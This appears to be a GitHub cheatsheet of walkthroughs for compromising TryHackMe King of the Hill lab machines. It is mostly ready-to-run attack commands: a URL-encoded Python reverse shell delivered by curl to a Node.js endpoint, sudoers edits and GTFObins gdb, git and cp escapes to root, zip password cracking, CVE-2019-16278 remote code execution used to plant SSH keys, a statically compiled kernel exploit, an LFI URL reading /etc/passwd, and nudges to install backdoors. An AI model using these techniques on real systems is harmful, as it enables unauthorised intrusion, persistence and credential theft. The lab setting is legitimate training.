Sorry I am lazy AF, will update more machines soon!
I am not posting the methods that are 'technically' better, I am posting methods that will be easiest to do and will get you win. Target is to win while being inside the rules. This is not an exam, there are no wrong answers. As the saying goes, If it works, don't touch it.
This a github cheatsheet of owning the machines in King of the Hill game of TryHackMe.
NMAP scan with -p- revealed that there is a telnet running on port 46969.
So following are the steps to get root, ASAP.
- Connect on the port:
telnet <IP> 46969 - The Username and password are in caesor cipher.
Username: food
Password: givemecookies - After scanning the machine with linPEAS.sh, We found that
vim.basicbinary is vuln to read and write to privilaged files.vim.basic /etc/sudoers
Press i
Add this line after the line withrootis the start.
food ALL=(ALL:ALL) ALL
Press Ctrl+[
Press :w! Enter
Press :q! Enter
sudo su
In prompt enter the password of food, i.e.givemecookies
This is first and relatively easy machine, But beaware this things have too many entries to keep an eye on, Best Idea for defending this is by just killing the shells. Again I am not posting the methods that are 'technically' better, I am posting methods that will be easiest to do and will get you win. Target is to win while being inside the rules. This is not an exam, there are no wrong answers. As the saying goes, If it works, don't touch it.
- Initial gobuster scan revealed that
robots.txtfile contains an abnormal entry, When we navigate to it, we find the entire RSA key.
-
Copy the key, paste it in a file, give the file necessary permissions.
Assuming you made the RSA key file with the nameid_rsa, follow these commands.
chmod 600 id_rsa
ssh -i id_rsa shrek@<IP ADDRESS OF MACHINE>
This will give you a shell to shrek. -
After scanning the machine with linPEAS.sh, We found tha there is a gdb vulnerabilty in the box, using GTFObins, We use the following commands to do Privilage escalation.
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
This machine is race to root kind of thing, There is a very low hanging fruit to get root, But it is a way use only entry, i.e. Whoever uses it first will try his best to destory this entry as it is too open.
-
As always we do the basic nmap scan.
-
We can see port 3000 is hosting Nodejs openly, So we try to get the reverse shell from it.
To do that, First start a listener on your machine using these commands:
ncat -lvnp 4444// I am using ncat, since I am on a Arch based system, You can usencinplace of ncat.
Once the listener is ready, we deploy the payload. -
After testing many payloads we found the one of python to be working, For more payloads, follow this link.
The payload:
REPLACE <REMOTE_IP> with the IP of box.
REPLACE <LOCAL_IP> with the IP of your tryhackme VPN.curl "<REMOTE_IP>:3000/?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22<LOCAL_IP>%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27"On listener, you can see that we have a shell now.
-
After trying a lot of tests and linPEAS, I found that the easiest method to get king AND root shell is to exploit the
cpvulnerability on the box. I am leaving the ideas to you for this one, but after making you king.LFILE=/root/king.txt
echo "<YOUR USERNAME>" | cp /dev/stdin "$LFILE"
Free Tip: (You know you can read anyfile with this vuln, use your imagination.)
LFILE=file_to_read
cp "$LFILE" /dev/stdout
Now this is new machine, Released very recently,
And made it hard for me to post direct commands, Why?
Heres why, In this machine, there's a thing called autogen script, that regenrates everything at every reset. That means direct credentials doesn't work anymore. So you have to follow the instructions and do everything manually.
Let's Hack:
- Initial nmap scans revealed that theres a netcat port open at 3333.
-
When we connect to it, It gives out a weird base64 hash, After fiddling around, I found that it is base data of a zip file, so we use this Site.
Copy the base64 hash to this site, and it will generate a file named application.zip. -
Now when we try to open the file, The file needs a password, Just crack this file using fcrackzip and wordlist rockyou.txt.
fcrackzip -v -u -D -p ~/wordlists/rockyou.txt application.zip
Once you have the password, unzip it.
unzip application.zip
$IP = IP of KoTH box
$location = address of your rockyou wordlist
Copy the hash in a file,
cat file.txt | base64 -d > test.zip; unzip -P (fcrackzip -v -u -D -p $location/rockyou.txt test.zip | grep "pw" |awk '{print $5}') test.zip; cat creds.txt
You get a file named creds.txt, Inside it we have the login details of user named fortuna. Lets GO.
4. Using the creds,
ssh fortuna@<BOX IP>
5. Now that we have the shell, We can work on Privilage escalation.
After linpeas and basic test, I found that:
5.1 We as fortuna are in sudoers list.
5.2 And we also have pico in the sudo -l list.
- We can simply edit the
/etc/sudoers/file to give us ALL permissions to run sudo. - Using this command:
sudo pico /etc/sudoers
Replacepicoin sudoers file withALL. - Now you can just do,
sudo suand you are root.
This machine is one of the easist ones.
- Basic enumeration will get you the password/ssh id_rsa key of user Ashu.
- Once you are in machine with user as Ashu.
Check thesudo -l, you will see that you can runsuon for user skiddy without password. - After,
sudo su skiddy, You are in the skiddy shell. - We don't need to enumerate this machine anymore. The
sudo -lcan show that we can rungitas sudo. - Using GTFObins, we see that the following commands can be used to give us root shell.
sudo git -p help config
!/bin/sh
Now,id, Voila, You are root.
P.S. Food for thought, there are two interesting ports open on machine, see if you can setup backdoors for you ;)
-
After nmap scan we can see that weirdly there is no ssh on the machine. But nostromo is present at port 8080.
Later after doing complete scan we found that the port for ssh is shifted to port 1337.
-
Searching for this vuln, we found that this specific version is vulnerable to CVE-2019-16278.
-
Simply downloading the exploit from exploitdb, we can get RCE on machine. Note this CVE is python2 based.
python2 cve2019-16278.py <KOTH MACHINE IP> 8080 "whoami"
Online there are methods to use this CVE to get a reverse shell. But For some weird reason I was not able to get a rev shell from this. So here's my workaround.
First we generate sshkey in our machine, then we add the authorized_keys to the machine, as we have RCE.
4. Generating sshkeys:
ssh-keygen
5. Getting the authorized_keys:
We need the *.pub file's data for this, It would look like this:
6. Now use this command:
python2 cve2019-16278.py <KOTH IP> 8080 "mkdir /home/gloria/.ssh; echo '<YOUR *.pub file data>' > /home/gloria/.ssh/authorized_keys"
7. Now we can simply ssh into the machine with our sshkey.
ssh -i sshkey gloria@<KOTH BOX IP> -p 1337
8. And since we are in authorized_keys, we will be logged in without password.
9. Since we have a shell, Priv Esc is the next step. After some LinPEAS and LinEnum, I found that this box's kernel is vulnerable to cve-2017-16995.
10. So we download the exploit from exploitdb and Here's a little trick to save compiling time on remote machine.
Instead of uploading and compiling the exploit on remote machine, we can use --static in gcc to make a binary that's useable everywhere.
gcc --static cve-2017-16995.c -o cve-2017-16995 && chmod +x cve-2017-16995
11. Now just upload the binary to the remote box, and run it to get root.
P.S. If you are locked out and forgot to make a backdoor, here's food for thought:
There's LFI on this address.
http://lion.thm:5555/?page=php://filter/convert.base64-encode/resource=../../../../etc/passwd
where, lion.thm is the IP of machine in hosts file. ;) (Maybe you can get id_rsa)